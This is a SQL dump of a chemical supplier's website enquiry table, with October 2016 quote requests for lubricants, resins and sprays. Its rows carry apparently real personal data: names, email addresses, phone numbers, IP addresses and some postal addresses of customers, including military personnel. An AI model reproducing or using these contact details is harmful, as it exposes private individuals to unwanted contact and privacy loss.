INSERT INTO `wp_enquiry_detail_new` VALUES (40, 'IDOLINA VALENZUELA', 'i.valenzuela@mefasa.org', 'favor de cotizarmeLUBRICANT, MOLD RELEASE - MS-122AD (PN STLUBE0037 ', '1160250', 'cotizacion lubricante', '189.252.72.182', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-06 18:03:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (41, 'Jared Grover', 'jared.grover@navy.mil', 'I need a quote to purchase both the Epon 815c resin and the Versamid 140 hardner to use in a technology demo for the US Navy. I need approximately 200 gallons of the final product (mixed resin and hardener together) for this demo. Please send me a quote or call my cell phone to discuss further details\nJared Grover\nCell 760-608-7799', '7606087799', 'Epon 815c resin and Versamid 140 Hardner', '138.163.106.71', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-06 18:38:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (42, 'Patrick Whalen', 'pgwhalen@arlut.utexas.edu', 'Please provide me with a quote for 12 cans (1 box) of MS-465C', '5128353556', 'MS-465C', '146.6.208.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"733";s:5:"title";s:7:"MS-465C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-465C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-06 19:20:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (43, 'Tucker Booth', 'mbooth@lsst.org', 'Please send information regarding packaging options and pricing for your PFPE solvents.\n\nBest,\nTucker', '5203188134', 'Quote for MS-250 and Variants', '140.252.33.47', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1711";s:5:"title";s:26:"PFPE Re-Move™ MS 250/252";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-250.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-06 22:39:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (44, 'rwilliams', 'rwilliams@lsisolutions.com', 'Can you provide pricing for different quantities?  \n1 can\n1 case\nother possible discounted pricing?', '5859199912', 'Price Quote', '174.47.212.222', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-07 13:05:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (45, 'Chuck Bell', 'cmbell@goodyear.com', 'Just requesting a price quote / list for this material and other products that work with the Cobra Spray Brush.', '3307962033', 'MS-222N Price', '167.232.248.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-07 13:25:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (46, 'rwilliams', 'rwilliams@lsisolutions.com', 'Need a quote for 10% PTFE in the quart container', '5858696636', 'MS-143XD-10', '174.47.212.222', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:8:"MS-143XD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-07 19:56:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (47, 'Lawrence Zendler', 'lawrencezendler@yahoo.com', 'consumer application', '5753739569', 'grease for trailer bearings', '174.56.125.178', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"821";s:5:"title";s:7:"GPL 214";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_416352307.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-08 16:06:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (48, 'Julie Kanewske', 'julie.kanewske@carboceramics.com', 'Please send me pricing for a gallon of the MS-111 Epoxy Stripping Agent. \n\nCARBO Ceramics\n5050 Westway Park Blvd STE 150\nHouston, Texas 77041', '2818865712', 'MS-111 Quote', '10.13.10.72', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-10 18:17:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (49, 'David Kristof', 'David.kristof@l-3com.com', 'Can\'t find on website, can you tell me what the solids vs. Solvents content is in the 472C Urethane coating?\nThanks\nDave', '', '472C', '70.208.193.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-10 22:57:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (50, 'Gavin ', 'gavin.mcgregor@halliburton.com', 'Hi\n\n I am looking for an SDS for the above product however I am struggling to find it on you website, would you be able to send me a copy', '01224776939', 'ms-122ax', '34.160.80.138', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-11 09:59:17', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (51, 'Seth Meeker', 'srmeeker@physics.ucsb.edu', 'I\'d like a quote for 1 quart of MS-111 Epoxy stripping agent.\n\nThank you!\n', '8058933079', 'MS-111 Quote', '128.111.23.213', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-11 17:31:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (52, 'Jim Conard', 'jim.conard@gmail.com', 'Is this good to clean connectors on a audio mixer?', '9164393773', 'MS-738', '67.182.116.68', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1840";s:5:"title";s:6:"MS-738";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/connector-lubricant-2-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 04:02:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (53, 'Igor Horvatincic', 'igor@datal.com', 'KRYTOX XHT-BDZ 2oz 1pc\n\nDATA LINK d.o.o.\nBlajburskih zrtava 16\n43000 Bjelovar\nCroatia', '0038543211111', 'KRYTOX XHT-BDZ 2oz', '93.142.237.197', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"696";s:5:"title";s:7:"XHT-BDZ";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_68906731.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 07:11:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (54, 'Nikolay', 'n.churikov@witterussland.ru', 'Where can we buy this item in Russia?', '', 'Price', '109.188.73.229', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 11:25:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (55, 'JAQUET Technology Group AG', 'einkauf@jaquet.com', 'Dear Sir or Madam\n\nDou you have an official distributer for Switzerland we can order from your article?\n\nThank you in advance and kind regards\n\nJessica Lohnert\nPurchasing Team', '0041613068822', 'Request', '213.189.136.90', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 12:35:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (56, 'Dan Test', 'ddillulio@mschem.com', 'test', '2032222222', 'test', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1097";s:5:"title";s:29:"Teflon Heavy Equipment Grease";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_166416101.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 13:25:58', '', NULL, '', '', '', NULL, '2016-10-12 00:00:00', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (57, 'Sue Prattley', 'Suep@solidstatelogic.com', 'Hi there,\nPlease could you email me the MSDS for the above product\nkindest regards\nSue', '01865842300', 'Safety Data Sheet', '31.6.74.194', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1836";s:5:"title";s:7:"MS-538N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:95:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/electrical-contact-lubricant-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 13:36:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (58, 'Erik Carrillo', 'erik.carrillo@ustg.net', 'Please quote the following:\n\nITEM: MS-122SE\nQTY: 50\nEND USER: GE AVIATION - SANTA ANA, CA 92705', '9492554525', 'RFQ', '12.199.138.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:8:"MS-122SE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 15:25:44', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (59, 'Yuanxi Liao', 'yliao@atrpsolutions.com', 'Our company, ATRP Solutions, Inc. would like to order 250 grams of Vazo 52 immediately. Could you please give me a quote? Thanks!', '4129995891', 'quote for vazo 52', '199.255.170.74', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 15:59:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (60, 'JAKE VAUGHAN', 'JAKE.VAUGHAN@US.AF.MIL', 'I NEED TO HAVE A QUOTE FOR A ORDER OF QUICK FREEZE. CURRENTLY WE CAN ONLY BUY 2  CANS AT A TIME BUT WERE WORKING A LETTER TO BUY 10 AT A TIME SO IF YOU COULD PROVIDE TWO QUOTES THAT WOULD BE GREAT.  THIS WILL ALSO BE A GOVERNMENT PURCHASE CARD PURCHASE.  ', '5757842025', 'QUICK FREEZE ', '132.3.45.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-12 16:22:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (61, 'Mark Moshlak', 'kewlguy@pacbell.net', 'Good morning,\n\nMy father used to purchase your glass cleaner as it provided streak-free cleaning.  How much would it be to purchase?', '8182165130', 'MS-260 glass cleaner quote', '104.34.127.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 05:33:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (62, 'Maddalena Comini', 'm.comini@fz-juelich.de', 'Dear Miller-Stephenson,\n\nI would be interested in one of your products, that is the EPON Resin 8280 and therefore I would like to know its pricing list.\n\nThank you very much for your Attention,\n\nKind Regards,\nMaddalena Comini', '', '', '134.94.80.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"891";s:5:"title";s:12:"EPON™ 8280";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8280.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 14:08:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (63, 'Mitch Pratl', 'mpratl@gsitech.com', 'Looking for a quote for 2 tubes', '6304613821', 'GPL 226', '50.204.254.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 14:35:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (64, 'US Coast Guard', 'elliott.t.cavanaugh2@uscg.mil', 'Quote Request for Epon 828 Resin\nThank you', '', '', '152.121.19.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 16:35:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (65, 'Jake Vaughan', 'jake.vaughan@us.af.mil', 'I need to make a GPC government purchase for quick freeze ', '5757842025', 'quick freeze', '132.3.45.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 18:26:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (66, 'Andrew Lottinger', 'lottingeraudio@gmail.com', 'Good Thursday to you!\n\nI was wondering if you guys still stocked the Safezone Contact Re-Nu MS-930/CO2. If not, how do MS-530 and MS-532 compare? Please provide all information you can.\n\nThanks,\nAndrew Lottinger', '5048106921', 'MS-930?', '76.90.122.91', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:15:"Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 18:56:47', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (67, 'John Leman', 'leman@crd.ge.com', 'Price quote for a 55-gal drum of this, please.', '', '', '66.195.233.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"885";s:5:"title";s:11:"EPON™ 834";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-834.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-13 23:14:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (68, 'Jason Neufeldt', 'jneufeldt@q.com', 'Looking to sample the Krytox XP 1A0. Do you guys have it in a 1oz needle bottle?\n\nThank you\nJason Neufeldt', '', 'XP 1A0 1oz needle bottle', '174.22.6.188', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"992";s:5:"title";s:6:"XP 1A0";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-14 04:05:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (69, 'Michael Diaz', 'Michael.d.diaz@fe.navy.mil', 'Good morning, \n\nI am requesting a quote for a quantity of 5. My mailing and billing address is, CFAF AIMD ATSUGI, BLDG. 194, OOHGAMI, AYASE-SHI, KANAGAWA KEN, JAPAN 252-1101. Our preferred method of shipping is FEDEX. I am an active duty service member in Japan and I requesting hazmat and shipping be tax exempt due to military contract. Thank you in advance.\n\nVery respectfully,\nPO3 Michael Diaz\nAIMD Atsugi', '07013992195', 'price quote ', '163.251.239.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"439";s:5:"title";s:7:"GPL 104";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease4.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-17 02:34:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (70, 'jenny ', 'jenny.nguyen@tru-fitsolutions.com', 'REQUEST FOR QUOTE FOR QTY 1 GPL-105 MILLER STEPHENSON 1OZ.', '4087277558', 'RFQ GPL-105 MILLER STEPHENSON', '67.169.80.52', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"440";s:5:"title";s:7:"GPL 105";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-17 03:53:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (71, 'Jessica Guadalupe', 'jguada03@harris.com', 'Please provide price quote for 1 gallon', '3217274699', 'EPON Resin 828', '10.98.18.32', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-17 14:54:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (72, 'Philip Schluckebier', 'pschluck@aviorcontrols.com', 'Pricing for qt size , also for Gallon size.', '7204913708', 'Pricing for Vertrel XF', '50.78.202.1', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-18 15:46:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (73, 'Derek Raposo', 'djraposo80@comcast.net', 'need pricing on this also would this be comparable to MS-122RB, i see this is no longer on your site', '', 'Pricing', '64.196.212.89', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-19 15:09:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (74, 'Piotr Wolski', 'pwmea@onet.eu', 'Good Day\nFor one of my key client (state delivery) I am looking for NSN 9150015285624, P/N: MS-122AD - 5pcs. Could you please send me price offer and delivery time. The subject is very ungry so if possible kindly ask for reply asap. Thank you.\nBest Regards\nPiotr Wolski\nmob ++48609481558\nPW MEA\nNCAGE 2913H\nos.Lecha 42/52\n61-294 Poznan\nPOLAND', '48609481558', 'NSN 9150015285624, P/N: MS-122AD', '77.65.80.142', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-19 16:14:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (75, 'James Sizemore', 'james.sizemore@calspan.com', 'Looking for a quote on the Quik-Freeze 242. Also, what is the application process for this spray, is it only an aerosol that is applied as a fog?', '', 'Quote for Quik-Freeze', '65.216.171.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-19 16:54:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (76, 'Chris Fu', 'chrisf@ecousarecycling.com', 'Please quote me for 10 KG of the  XP 1A4 fluid.', '2012825900', 'Inquiry for XP 1A4', '108.53.187.9', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"997";s:5:"title";s:6:"XP 1A4";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-5.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-19 19:46:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (77, 'Chih Cheng Chang', 'chihcheng@umail.ucsb.edu', 'Hi, please give me the quote of MS-222N. Is there any discount for academic user? \nChih-Cheng Chang\nDepartment of Chemical Engineering\nUniversity of California, Santa Barbara', '8058863297', 'quote needed', '128.111.82.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-19 22:20:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (78, 'Tim MacSweyn', 'cft.mac@gmail.com', 'I am looking for the price of a two ounce tube of the 226 please.  To be used on the moving parts inside the compression tube of a spring powered air rifle.  Thanks\n\nTim MacSweyn', '9058355466', 'Price of GPL 226', '76.69.128.25', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2016-10-20 01:22:46', '', NULL, '', '', '', NULL, '', ''); 
